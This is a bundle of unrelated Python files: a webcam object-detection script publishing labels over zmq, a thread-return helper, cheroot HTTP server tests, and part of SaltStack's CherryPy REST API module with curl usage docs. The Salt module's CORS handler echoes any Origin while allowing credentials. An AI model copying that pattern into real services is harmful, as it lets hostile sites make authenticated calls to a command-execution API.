Tensorflow model into memory. 
detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) fps = FPS().start() while True: fps.update() frame = input_q.get() frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output_q.put(detect_objects(frame_rgb, sess, detection_graph)) fps.stop() sess.close() #publish information about detected objects via zmq def publish_detected_object(): context = zmq.Context() socket = context.socket(zmq.PUB) addr = '127.0.0.1' # remote ip or localhost port = "5556" # same as in the pupil remote gui socket.bind("tcp://{}:{}".format(addr, port)) time.sleep(1) while True: #publish the label only if there is a fixation and label label_conf = label_q.get() print('label',label_conf.split()) if label_conf: #print(self.label, self.fixation_norm_pos) topic = 'detected_object' # this only works for one and 2 word objects for now if len(label_conf.split())==2: label = label_conf.split()[0][:-1] confidence = label_conf.split()[1][:-1] if len(label_conf.split())==3: label = label_conf.split()[0] + ' ' + label_conf.split()[1][:-1] confidence = label_conf.split()[2][:-1] print ('%s %s %s' % (topic, label, confidence)) try: socket.send_string('%s %s %s' % (topic, label, confidence)) except TypeError: socket.send('%s %s' % (topic, label, confidence)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-src', '--source', dest='video_source', type=int, default=-1, help='Device index of the camera.') parser.add_argument('-wd', '--width', dest='width', type=int, default=1280, help='Width of the frames in the video stream.') parser.add_argument('-ht', '--height', dest='height', type=int, default=720, help='Height of the frames in the video stream.') args = parser.parse_args() input_q = Queue(2) # fps is better if queue is higher but then more lags output_q = Queue() label_q = Queue() for i in range(1): t = Thread(target=worker, args=(input_q, output_q)) t.daemon = True t.start() p = Process(target=publish_detected_object) p.daemon= True p.start() video_capture = WebcamVideoStream(src=args.video_source, width=args.width, height=args.height).start() fps = FPS().start() while True: frame = video_capture.read() input_q.put(frame) t = time.time() if output_q.empty(): pass # fill up queue else: font = cv2.FONT_HERSHEY_SIMPLEX data = output_q.get() rec_points = data['rect_points'] class_names = data['class_names'] class_colors = data['class_colors'] for point, name, color in zip(rec_points, class_names, class_colors): #print(point, name, color) print("name[0]", name[0]) label_q.put(name[0]) cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), (int(point['xmax'] * args.width), int(point['ymax'] * args.height)), color, 3) cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), (int(point['xmin'] * args.width) + len(name[0]) * 6, int(point['ymin'] * args.height) - 10), color, -1, cv2.LINE_AA) cv2.putText(frame, name[0], (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), font, 0.3, (0, 0, 0), 1) cv2.imshow('Video', frame) fps.update() print('[INFO] elapsed time: {:.2f}'.format(time.time() - t)) if cv2.waitKey(1) & 0xFF == ord('q'): break fps.stop() print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed())) print('[INFO] approx. 
FPS: {:.2f}'.format(fps.fps())) video_capture.stop() cv2.destroyAllWindows()
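publish_detected_object() above broadcasts "detected_object <label> <confidence>" strings over a zmq PUB socket on port 5556. A minimal subscriber that would receive them could look like this sketch, reusing the address and topic hard-coded above:

import zmq

context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect('tcp://127.0.0.1:5556')
socket.setsockopt_string(zmq.SUBSCRIBE, 'detected_object')

while True:
    message = socket.recv_string()        # e.g. 'detected_object person 87'
    topic, payload = message.split(' ', 1)
    print(topic, payload)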
thread_returnvalue.py
from threading import Thread
import time


class WorkerThread(Thread):
    """Thread subclass that captures the target's return value for join()."""

    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs=None, *, daemon=None):
        Thread.__init__(self, group, target, name, args, kwargs, daemon=daemon)
        self._return = None

    def run(self):
        # Store the result so it can be handed back from join().
        self._return = self._target(*self._args, **self._kwargs)

    def join(self):
        Thread.join(self)
        return self._return


def call():
    result = []
    time.sleep(3)
    for i in range(10000):
        result.append(i)
    add = sum(result)
    return add


if __name__ == '__main__':
    print('Program running...')
    worker = WorkerThread(target=call)
    worker.start()
    result = worker.join()
    print('Program finished:', result)
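WorkerThread exists purely to get a return value back out of a thread; the standard library's concurrent.futures covers the same need. A comparison sketch using the call() function defined above:

from concurrent.futures import ThreadPoolExecutor

with ThreadPoolExecutor(max_workers=1) as pool:
    future = pool.submit(call)                     # runs call() in a worker thread
    print('Program finished:', future.result())   # blocks like worker.join()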
test_server.py
"""Tests for the HTTP server.""" # -*- coding: utf-8 -*- # vim: set fileencoding=utf-8 : from __future__ import absolute_import, division, print_function __metaclass__ = type from contextlib import closing import os import socket import tempfile import threading import uuid import pytest import requests import requests_unixsocket import six from six.moves import urllib from .._compat import bton, ntob from .._compat import IS_LINUX, IS_MACOS, IS_WINDOWS, SYS_PLATFORM from ..server import IS_UID_GID_RESOLVABLE, Gateway, HTTPServer from ..testing import ( ANY_INTERFACE_IPV4, ANY_INTERFACE_IPV6, EPHEMERAL_PORT, ) unix_only_sock_test = pytest.mark.skipif( not hasattr(socket, 'AF_UNIX'), reason='UNIX domain sockets are only available under UNIX-based OS', ) non_macos_sock_test = pytest.mark.skipif( IS_MACOS, reason='Peercreds lookup does not work under macOS/BSD currently.', ) @pytest.fixture(params=('abstract', 'file')) def unix_sock_file(request): """Check that bound UNIX socket address is stored in server.""" name = 'unix_{request.param}_sock'.format(**locals()) return request.getfixturevalue(name) @pytest.fixture def unix_abstract_sock(): """Return an abstract UNIX socket address.""" if not IS_LINUX: pytest.skip( '{os} does not support an abstract ' 'socket namespace'.format(os=SYS_PLATFORM), ) return b''.join(( b'\x00cheroot-test-socket', ntob(str(uuid.uuid4())), )).decode() @pytest.fixture def unix_file_sock(): """Yield a unix file socket.""" tmp_sock_fh, tmp_sock_fname = tempfile.mkstemp() yield tmp_sock_fname os.close(tmp_sock_fh) os.unlink(tmp_sock_fname) def test_prepare_makes_server_ready(): """Check that prepare() makes the server ready, and stop() clears it.""" httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) assert not httpserver.ready assert not httpserver.requests._threads httpserver.prepare() assert httpserver.ready assert httpserver.requests._threads for thr in httpserver.requests._threads: assert thr.ready httpserver.stop() assert not httpserver.requests._threads assert not httpserver.ready def test_stop_interrupts_serve(): """Check that stop() interrupts running of serve().""" httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) httpserver.prepare() serve_thread = threading.Thread(target=httpserver.serve) serve_thread.start() serve_thread.join(0.5) assert serve_thread.is_alive() httpserver.stop() serve_thread.join(0.5) assert not serve_thread.is_alive() @pytest.mark.parametrize( 'ip_addr', ( ANY_INTERFACE_IPV4, ANY_INTERFACE_IPV6, ), ) def test_bind_addr_inet(http_server, ip_addr): """Check that bound IP address is stored in server.""" httpserver = http_server.send((ip_addr, EPHEMERAL_PORT)) assert httpserver.bind_addr[0] == ip_addr assert httpserver.bind_addr[1] != EPHEMERAL_PORT @unix_only_sock_test def test_bind_addr_unix(http_server, unix_sock_file): """Check that bound UNIX socket address is stored in server.""" httpserver = http_server.send(unix_sock_file) assert httpserver.bind_addr == unix_sock_file @unix_only_sock_test def test_bind_addr_unix_abstract(http_server, unix_abstract_sock): """Check that bound UNIX abstract socket address is stored in server.""" httpserver = http_server.send(unix_abstract_sock) assert httpserver.bind_addr == unix_abstract_sock PEERCRED_IDS_URI = '/peer_creds/ids' PEERCRED_TEXTS_URI = '/peer_creds/texts' class _TestGateway(Gateway): def respond(self): req = self.req conn = req.conn req_uri = bton(req.uri) if req_uri == PEERCRED_IDS_URI: peer_creds = 
conn.peer_pid, conn.peer_uid, conn.peer_gid self.send_payload('|'.join(map(str, peer_creds))) return elif req_uri == PEERCRED_TEXTS_URI: self.send_payload('!'.join((conn.peer_user, conn.peer_group))) return return super(_TestGateway, self).respond() def send_payload(self, payload): req = self.req req.status = b'200 OK' req.ensure_headers_sent() req.write(ntob(payload)) @pytest.fixture def peercreds_enabled_server(http_server, unix_sock_file): """Construct a test server with ``peercreds_enabled``.""" httpserver = http_server.send(unix_sock_file) httpserver.gateway = _TestGateway httpserver.peercreds_enabled = True return httpserver @unix_only_sock_test @non_macos_sock_test def test_peercreds_unix_sock(peercreds_enabled_server): """Check that ``PEERCRED`` lookup works when enabled.""" httpserver = peercreds_enabled_server bind_addr = httpserver.bind_addr if isinstance(bind_addr, six.binary_type): bind_addr = bind_addr.decode() quoted = urllib.parse.quote(bind_addr, safe='') unix_base_uri = 'http+unix://{quoted}'.format(**locals()) expected_peercreds = os.getpid(), os.getuid(), os.getgid() expected_peercreds = '|'.join(map(str, expected_peercreds)) with requests_unixsocket.monkeypatch(): peercreds_resp = requests.get(unix_base_uri + PEERCRED_IDS_URI) peercreds_resp.raise_for_status() assert peercreds_resp.text == expected_peercreds peercreds_text_resp = requests.get(unix_base_uri + PEERCRED_TEXTS_URI) assert peercreds_text_resp.status_code == 500 @pytest.mark.skipif( not IS_UID_GID_RESOLVABLE, reason='Modules `grp` and `pwd` are not available ' 'under the current platform', ) @unix_only_sock_test @non_macos_sock_test def test_peercreds_unix_sock_with_lookup(peercreds_enabled_server): """Check that ``PEERCRED`` resolution works when enabled.""" httpserver = peercreds_enabled_server httpserver.peercreds_resolve_enabled = True bind_addr = httpserver.bind_addr if isinstance(bind_addr, six.binary_type): bind_addr = bind_addr.decode() quoted = urllib.parse.quote(bind_addr, safe='') unix_base_uri = 'http+unix://{quoted}'.format(**locals()) import grp import pwd expected_textcreds = ( pwd.getpwuid(os.getuid()).pw_name, grp.getgrgid(os.getgid()).gr_name, ) expected_textcreds = '!'.join(map(str, expected_textcreds)) with requests_unixsocket.monkeypatch(): peercreds_text_resp = requests.get(unix_base_uri + PEERCRED_TEXTS_URI) peercreds_text_resp.raise_for_status() assert peercreds_text_resp.text == expected_textcreds @pytest.mark.skipif( IS_WINDOWS, reason='This regression test is for a Linux bug, ' 'and the resource module is not available on Windows', ) @pytest.mark.parametrize( 'resource_limit', ( 1024, 2048, ), indirect=('resource_limit',), ) @pytest.mark.usefixtures('many_open_sockets') def test_high_number_of_file_descriptors(resource_limit): """Test the server does not crash with a high file-descriptor value. This test shouldn't cause a server crash when trying to access file-descriptor higher than 1024. The earlier implementation used to rely on ``select()`` syscall that doesn't support file descriptors with numbers higher than 1024. 
""" # We want to force the server to use a file-descriptor with # a number above resource_limit # Create our server httpserver = HTTPServer( bind_addr=(ANY_INTERFACE_IPV4, EPHEMERAL_PORT), gateway=Gateway, ) httpserver.prepare() try: # This will trigger a crash if select() is used in the implementation httpserver.tick() except: # noqa: E722 raise # only needed for `else` to work else: # We use closing here for py2-compat with closing(socket.socket()) as sock: # Check new sockets created are still above our target number assert sock.fileno() >= resource_limit finally: # Stop our server httpserver.stop() if not IS_WINDOWS: test_high_number_of_file_descriptors = pytest.mark.forked( test_high_number_of_file_descriptors, ) @pytest.fixture def resource_limit(request): """Set the resource limit two times bigger then requested.""" resource = pytest.importorskip( 'resource', reason='The "resource" module is Unix-specific', ) # Get current resource limits to restore them later soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE) # We have to increase the nofile limit above 1024 # Otherwise we see a 'Too many files open' error, instead of # an error due to the file descriptor number being too high resource.setrlimit( resource.RLIMIT_NOFILE, (request.param * 2, hard_limit), ) try: # noqa: WPS501 yield request.param finally: # Reset the resource limit back to the original soft limit resource.setrlimit(resource.RLIMIT_NOFILE, (soft_limit, hard_limit)) @pytest.fixture def many_open_sockets(resource_limit): """Allocate a lot of file descriptors by opening dummy sockets.""" # Hoard a lot of file descriptors by opening and storing a lot of sockets test_sockets = [] # Open a lot of file descriptors, so the next one the server # opens is a high number try: for i in range(resource_limit): sock = socket.socket() test_sockets.append(sock) # If we reach a high enough number, we don't need to open more if sock.fileno() >= resource_limit: break # Check we opened enough descriptors to reach a high number the_highest_fileno = test_sockets[-1].fileno() assert the_highest_fileno >= resource_limit yield the_highest_fileno finally: # Close our open resources for test_socket in test_sockets: test_socket.close()
app.py
# encoding: utf-8 ''' A REST API for Salt =================== .. versionadded:: 2014.7.0 .. py:currentmodule:: salt.netapi.rest_cherrypy.app :depends: - CherryPy Python module. Version 3.2.3 is currently recommended when SSL is enabled, since this version worked the best with SSL in internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled. Be aware that there is a known `SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_ introduced in version 3.2.5. The issue was reportedly resolved with CherryPy milestone 3.3, but the patch was committed for version 3.6.1. :optdepends: - ws4py Python module for websockets support. :client_libraries: - Java: https://github.com/SUSE/saltstack-netapi-client-java - Python: https://github.com/saltstack/pepper :configuration: All authentication is done through Salt's :ref:`external auth <acl-eauth>` system which requires additional configuration not described here. Example production-ready configuration; add to the Salt master config file and restart the ``salt-master`` and ``salt-api`` daemons: .. code-block:: yaml rest_cherrypy: port: 8000 ssl_crt: /etc/pki/tls/certs/localhost.crt ssl_key: /etc/pki/tls/certs/localhost.key Using only a secure HTTPS connection is strongly recommended since Salt authentication credentials will be sent over the wire. A self-signed certificate can be generated using the :py:func:`~salt.modules.tls.create_self_signed_cert` execution function. Running this function requires pyOpenSSL and the ``salt-call`` script is available in the ``salt-minion`` package. .. code-block:: bash salt-call --local tls.create_self_signed_cert All available configuration options are detailed below. These settings configure the CherryPy HTTP server and do not apply when using an external server such as Apache or Nginx. port **Required** The port for the webserver to listen on. host : ``0.0.0.0`` The socket interface for the HTTP server to listen on. debug : ``False`` Starts the web server in development mode. It will reload itself when the underlying code is changed and will output more debugging info. ssl_crt The path to a SSL certificate. (See below) ssl_key The path to the private key for your SSL certificate. (See below) disable_ssl A flag to disable SSL. Warning: your Salt authentication credentials will be sent in the clear! webhook_disable_auth : False The :py:class:`Webhook` URL requires authentication by default but external services cannot always be configured to send authentication. See the Webhook documentation for suggestions on securing this interface. webhook_url : /hook Configure the URL endpoint for the :py:class:`Webhook` entry point. thread_pool : ``100`` The number of worker threads to start up in the pool. socket_queue_size : ``30`` Specify the maximum number of HTTP connections to queue. expire_responses : True Whether to check for and kill HTTP responses that have exceeded the default timeout. max_request_body_size : ``1048576`` Maximum size for the HTTP request body. collect_stats : False Collect and report statistics about the CherryPy server Reports are available via the :py:class:`Stats` URL. static A filesystem path to static HTML/JavaScript/CSS/image assets. static_path : ``/static`` The URL prefix to use when serving static assets out of the directory specified in the ``static`` setting. app A filesystem path to an HTML file that will be served as a static file. This is useful for bootstrapping a single-page JavaScript app. 
app_path : ``/app`` The URL prefix to use for serving the HTML file specified in the ``app`` setting. This should be a simple name containing no slashes. Any path information after the specified path is ignored; this is useful for apps that utilize the HTML5 history API. root_prefix : ``/`` A URL path to the main entry point for the application. This is useful for serving multiple applications from the same URL. .. _rest_cherrypy-auth: Authentication -------------- Authentication is performed by passing a session token with each request. Tokens are generated via the :py:class:`Login` URL. The token may be sent in one of two ways: * Include a custom header named :mailheader:`X-Auth-Token`. For example, using curl: .. code-block:: bash curl -sSk https://localhost:8000/login \ -H 'Accept: application/x-yaml' \ -d username=saltdev \ -d password=saltdev \ -d eauth=auto Copy the ``token`` value from the output and include it in subsequent requests: .. code-block:: bash curl -sSk https://localhost:8000 \ -H 'Accept: application/x-yaml' \ -H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\ -d client=local \ -d tgt='*' \ -d fun=test.ping * Sent via a cookie. This option is a convenience for HTTP clients that automatically handle cookie support (such as browsers). For example, using curl: .. code-block:: bash # Write the cookie file: curl -sSk https://localhost:8000/login \ -c ~/cookies.txt \ -H 'Accept: application/x-yaml' \ -d username=saltdev \ -d password=saltdev \ -d eauth=auto # Read the cookie file: curl -sSk https://localhost:8000 \ -b ~/cookies.txt \ -H 'Accept: application/x-yaml' \ -d client=local \ -d tgt='*' \ -d fun=test.ping .. seealso:: You can bypass the session handling via the :py:class:`Run` URL. Usage ----- Commands are sent to a running Salt master via this module by sending HTTP requests to the URLs detailed below. .. admonition:: Content negotiation This REST interface is flexible in what data formats it will accept as well as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded). * Specify the format of data in the request body by including the :mailheader:`Content-Type` header. * Specify the desired data format for the response body with the :mailheader:`Accept` header. Data sent in :http:method:`post` and :http:method:`put` requests must be in the format of a list of lowstate dictionaries. This allows multiple commands to be executed in a single HTTP request. The order of commands in the request corresponds to the return for each command in the response. Lowstate, broadly, is a dictionary of values that are mapped to a function call. This pattern is used pervasively throughout Salt. The functions called from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`. The following example (in JSON format) causes Salt to execute two commands, a command sent to minions as well as a runner function on the master:: [{ "client": "local", "tgt": "*", "fun": "test.fib", "arg": ["10"] }, { "client": "runner", "fun": "jobs.lookup_jid", "jid": "20130603122505459265" }] .. admonition:: x-www-form-urlencoded Sending JSON or YAML in the request body is simple and most flexible, however sending data in urlencoded format is also supported with the caveats below. It is the default format for HTML forms, many JavaScript libraries, and the :command:`curl` command. For example, the equivalent to running ``salt '*' test.ping`` is sending ``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body. 
Caveats: * Only a single command may be sent per HTTP request. * Repeating the ``arg`` parameter multiple times will cause those parameters to be combined into a single list. Note, some popular frameworks and languages (notably jQuery, PHP, and Ruby on Rails) will automatically append empty brackets onto repeated parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``, ``arg[]=two``. This is not supported; send JSON or YAML instead. .. |req_token| replace:: a session token from :py:class:`~Login`. .. |req_accept| replace:: the desired response format. .. |req_ct| replace:: the format of the request body. .. |res_ct| replace:: the format of the response body; depends on the :mailheader:`Accept` request header. .. |200| replace:: success .. |401| replace:: authentication required .. |406| replace:: requested Content-Type not available ''' # We need a custom pylintrc here... # pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613 # Import Python libs from __future__ import absolute_import import collections import itertools import functools import logging import json import StringIO import tarfile import time from multiprocessing import Process, Pipe # Import third-party libs # pylint: disable=import-error import cherrypy from cherrypy.lib import cpstats import yaml import salt.ext.six as six # pylint: enable=import-error # Import Salt libs import salt import salt.auth import salt.utils.event # Import salt-api libs import salt.netapi logger = logging.getLogger(__name__) # Imports related to websocket try: from .tools import websockets from . import event_processor HAS_WEBSOCKETS = True except ImportError: websockets = type('websockets', (object,), { 'SynchronizingWebsocket': None, }) HAS_WEBSOCKETS = False def html_override_tool(): ''' Bypass the normal handler and serve HTML for all URLs The ``app_path`` setting must be non-empty and the request must ask for ``text/html`` in the ``Accept`` header. ''' apiopts = cherrypy.config['apiopts'] request = cherrypy.request url_blacklist = ( apiopts.get('app_path', '/app'), apiopts.get('static_path', '/static'), ) if 'app' not in cherrypy.config['apiopts']: return if request.path_info.startswith(url_blacklist): return if request.headers.get('Accept') == '*/*': return try: wants_html = cherrypy.lib.cptools.accept('text/html') except cherrypy.HTTPError: return else: if wants_html != 'text/html': return raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app')) def salt_token_tool(): ''' If the custom authentication header is supplied, put it in the cookie dict so the rest of the session-based auth works as intended ''' x_auth = cherrypy.request.headers.get('X-Auth-Token', None) # X-Auth-Token header trumps session cookie if x_auth: cherrypy.request.cookie['session_id'] = x_auth def salt_ip_verify_tool(): ''' If there is a list of restricted IPs, verify current client is coming from one of those IPs. ''' # This is overly cumbersome and crude, # But, it's also safe... ish... 
salt_config = cherrypy.config.get('saltopts', None) if salt_config: cherrypy_conf = salt_config.get('rest_cherrypy', None) if cherrypy_conf: auth_ip_list = cherrypy_conf.get('authorized_ips', None) if auth_ip_list: logger.debug("Found IP list: {0}".format(auth_ip_list)) rem_ip = cherrypy.request.headers.get('Remote-Addr', None) logger.debug("Request from IP: {0}".format(rem_ip)) if rem_ip not in auth_ip_list: logger.error("Blocked IP: {0}".format(rem_ip)) cherrypy.response.status = 403 return { 'status': cherrypy.response.status, 'return': "Bad IP", } def salt_auth_tool(): ''' Redirect all unauthenticated requests to the login page ''' # Redirect to the login page if the session hasn't been authed if 'token' not in cherrypy.session: # pylint: disable=W8601 raise cherrypy.HTTPError(401) # Session is authenticated; inform caches cherrypy.response.headers['Cache-Control'] = 'private' def cors_handler(*args, **kwargs): ''' Check a CORS preflight request and return a valid response ''' req_head = cherrypy.request.headers resp_head = cherrypy.response.headers ac_method = req_head.get('Access-Control-Request-Method', None) allowed_methods = ['GET', 'POST'] allowed_headers = ['X-Auth-Token', 'Content-Type'] if ac_method and ac_method in allowed_methods: resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods) resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers) resp_head['Connection'] = 'keep-alive' resp_head['Access-Control-Max-Age'] = '1400' return {} def cors_tool(): ''' Handle both simple and complex CORS requests Add CORS headers to each response. If the request is a CORS preflight request swap out the default handler with a simple, single-purpose handler that verifies the request and provides a valid CORS response. ''' req_head = cherrypy.request.headers resp_head = cherrypy.response.headers # Always set response headers necessary for 'simple' CORS. resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*') resp_head['Access-Control-Expose-Headers'] = 'GET, POST' resp_head['Access-Control-Allow-Credentials'] = 'true' # If this is a non-simple CORS preflight request swap out the handler. if cherrypy.request.method == 'OPTIONS': cherrypy.serving.request.handler = cors_handler # Be conservative in what you send # Maps Content-Type to serialization functions; this is a tuple of tuples to # preserve order of preference. ct_out_map = ( ('application/json', json.dumps), ('application/x-yaml', functools.partial( yaml.safe_dump, default_flow_style=False)), ) def hypermedia_handler(*args, **kwargs): ''' Determine the best output format based on the Accept header, execute the regular handler, and transform the output to the request content type (even if it's an error). :param args: Pass args through to the main handler :param kwargs: Pass kwargs through to the main handler ''' # Execute the real handler. Handle or pass-through any errors we know how # to handle (auth & HTTP errors). Reformat any errors we don't know how to # handle as a data structure. 
try: cherrypy.response.processors = dict(ct_out_map) ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs) except (salt.exceptions.EauthAuthenticationError, salt.exceptions.TokenAuthenticationError): raise cherrypy.HTTPError(401) except (salt.exceptions.SaltDaemonNotRunning, salt.exceptions.SaltReqTimeoutError) as exc: raise cherrypy.HTTPError(503, exc.strerror) except cherrypy.CherryPyException: raise except Exception as exc: import traceback logger.debug("Error while processing request for: %s", cherrypy.request.path_info, exc_info=True) cherrypy.response.status = 500 ret = { 'status': cherrypy.response.status, 'return': '{0}'.format(traceback.format_exc(exc)) if cherrypy.config['debug'] else "An unexpected error occurred"} # Raises 406 if requested content-type is not supported best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map]) # Transform the output from the handler into the requested output format cherrypy.response.headers['Content-Type'] = best out = cherrypy.response.processors[best] return out(ret) def hypermedia_out(): ''' Determine the best handler for the requested content type Wrap the normal handler and transform the output from that handler into the requested content type ''' request = cherrypy.serving.request request._hypermedia_inner_handler = request.handler request.handler = hypermedia_handler @functools.wraps def process_request_body(fn): ''' A decorator to skip a processor function if process_request_body is False ''' def wrapped(*args, **kwargs): # pylint: disable=C0111 if cherrypy.request.process_request_body is not False: fn(*args, **kwargs) return wrapped def urlencoded_processor(entity): ''' Accept x-www-form-urlencoded data (run through CherryPy's formatter) and reformat it into a Low State data structure. Since we can't easily represent complicated data structures with key-value pairs, any more complicated requirements (e.g. compound commands) must instead be delivered via JSON or YAML. For example:: .. code-block:: bash curl -si localhost:8000 -d client=local -d tgt='*' \\ -d fun='test.kwarg' -d arg='one=1' -d arg='two=2' :param entity: raw POST data ''' # First call out to CherryPy's default processor cherrypy._cpreqbody.process_urlencoded(entity) cherrypy.serving.request.unserialized_data = entity.params cherrypy.serving.request.raw_body = '' @process_request_body def json_processor(entity): ''' Unserialize raw POST data in JSON format to a Python data structure. :param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = json.loads(body) except ValueError: raise cherrypy.HTTPError(400, 'Invalid JSON document') cherrypy.serving.request.raw_body = body @process_request_body def yaml_processor(entity): ''' Unserialize raw POST data in YAML format to a Python data structure. :param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = yaml.safe_load(body) except ValueError: raise cherrypy.HTTPError(400, 'Invalid YAML document') cherrypy.serving.request.raw_body = body @process_request_body def text_processor(entity): ''' Attempt to unserialize plain text as JSON Some large services still send JSON with a text/plain Content-Type. Those services are bad and should feel bad. 
:param entity: raw POST data ''' body = entity.fp.read() try: cherrypy.serving.request.unserialized_data = json.loads(body) except ValueError: cherrypy.serving.request.unserialized_data = body cherrypy.serving.request.raw_body = body def hypermedia_in(): ''' Unserialize POST/PUT data of a specified Content-Type. The following custom processors all are intended to format Low State data and will place that data structure into the request object. :raises HTTPError: if the request contains a Content-Type that we do not have a processor for ''' # Be liberal in what you accept ct_in_map = { 'application/x-www-form-urlencoded': urlencoded_processor, 'application/json': json_processor, 'application/x-yaml': yaml_processor, 'text/yaml': yaml_processor, 'text/plain': text_processor, } # Do not process the body for POST requests that have specified no content # or have not specified Content-Length if (cherrypy.request.method.upper() == 'POST' and cherrypy.request.headers.get('Content-Length', '0') == '0'): cherrypy.request.process_request_body = False cherrypy.request.unserialized_data = None cherrypy.request.body.processors.clear() cherrypy.request.body.default_proc = cherrypy.HTTPError( 406, 'Content type not supported') cherrypy.request.body.processors = ct_in_map def lowdata_fmt(): ''' Validate and format lowdata from incoming unserialized request data This tool requires that the hypermedia_in tool has already been run. ''' if cherrypy.request.method.upper() != 'POST': return data = cherrypy.request.unserialized_data # if the data was sent as urlencoded, we need to make it a list. # this is a very forgiving implementation as different clients set different # headers for form encoded data (including charset or something similar) if not isinstance(data, list): # Make the 'arg' param a list if not already if 'arg' in data and not isinstance(data['arg'], list): data['arg'] = [data['arg']] # Finally, make a Low State and put it in request cherrypy.request.lowstate = [data] else: cherrypy.serving.request.lowstate = data cherrypy.tools.html_override = cherrypy.Tool('on_start_resource', html_override_tool, priority=53) cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource', salt_token_tool, priority=55) cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body', salt_auth_tool, priority=60) cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body', hypermedia_in) cherrypy.tools.cors_tool = cherrypy.Tool('before_handler', cors_tool, priority=30) cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler', lowdata_fmt, priority=40) cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler', hypermedia_out) cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler', salt_ip_verify_tool) ############################################################################### class LowDataAdapter(object): ''' The primary entry point to Salt's REST API ''' exposed = True _cp_config = { 'tools.sessions.on': True, 'tools.sessions.timeout': 60 * 10, # 10 hours # 'tools.autovary.on': True, 'tools.hypermedia_out.on': True, 'tools.hypermedia_in.on': True, 'tools.lowdata_fmt.on': True, 'tools.salt_ip_verify.on': True, } def __init__(self): self.opts = cherrypy.config['saltopts'] self.api = salt.netapi.NetapiClient(self.opts) def exec_lowstate(self, client=None, token=None): ''' Pull a Low State data structure from request and execute the low-data chunks through Salt. The low-data chunks will be updated to include the authorization token for the current session. 
''' lowstate = cherrypy.request.lowstate # Release the session lock before executing any potentially # long-running Salt commands. This allows different threads to execute # Salt commands concurrently without blocking. if cherrypy.request.config.get('tools.sessions.on', False): cherrypy.session.release_lock() # if the lowstate loaded isn't a list, lets notify the client if not isinstance(lowstate, list): raise cherrypy.HTTPError(400, 'Lowstates must be a list') # Make any requested additions or modifications to each lowstate, then # execute each one and yield the result. for chunk in lowstate: if token: chunk['token'] = token if client: chunk['client'] = client # Make any 'arg' params a list if not already. # This is largely to fix a deficiency in the urlencoded format. if 'arg' in chunk and not isinstance(chunk['arg'], list): chunk['arg'] = [chunk['arg']] ret = self.api.run(chunk) # Sometimes Salt gives us a return and sometimes an iterator if isinstance(ret, collections.Iterator): for i in ret: yield i else: yield ret def GET(self): ''' An explanation of the API with links of where to go next .. http:get:: / :reqheader Accept: |req_accept| :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000 .. code-block:: http GET / HTTP/1.1 Host: localhost:8000 Accept: application/json **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Type: application/json ''' import inspect # Grab all available client interfaces clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient, predicate=inspect.ismethod) if not name.startswith('__')] clients.remove('run') # run method calls client interfaces return { 'return': "Welcome", 'clients': clients, } @cherrypy.tools.salt_token() @cherrypy.tools.salt_auth() def POST(self, **kwargs): ''' Send one or more Salt commands in the request body .. http:post:: / :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| :term:`lowstate` data describing Salt commands must be sent in the request body. **Example request:** .. code-block:: bash curl -sSik https://localhost:8000 \\ -H "Accept: application/x-yaml" \\ -H "X-Auth-Token: d40d1e1e<...snip...>" \\ -d client=local \\ -d tgt='*' \\ -d fun='test.ping' \\ .. code-block:: http POST / HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml X-Auth-Token: d40d1e1e Content-Length: 36 Content-Type: application/x-www-form-urlencoded fun=test.ping&client=local&tgt=* **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 200 Allow: GET, HEAD, POST Content-Type: application/x-yaml return: - ms-0: true ms-1: true ms-2: true ms-3: true ms-4: true **Other examples**: .. code-block:: bash # Sending multiple positional args with urlencoded: curl -sSik https://localhost:8000 \\ -d client=local \\ -d tgt='*' \\ -d fun='cmd.run' \\ -d arg='du -sh .' 
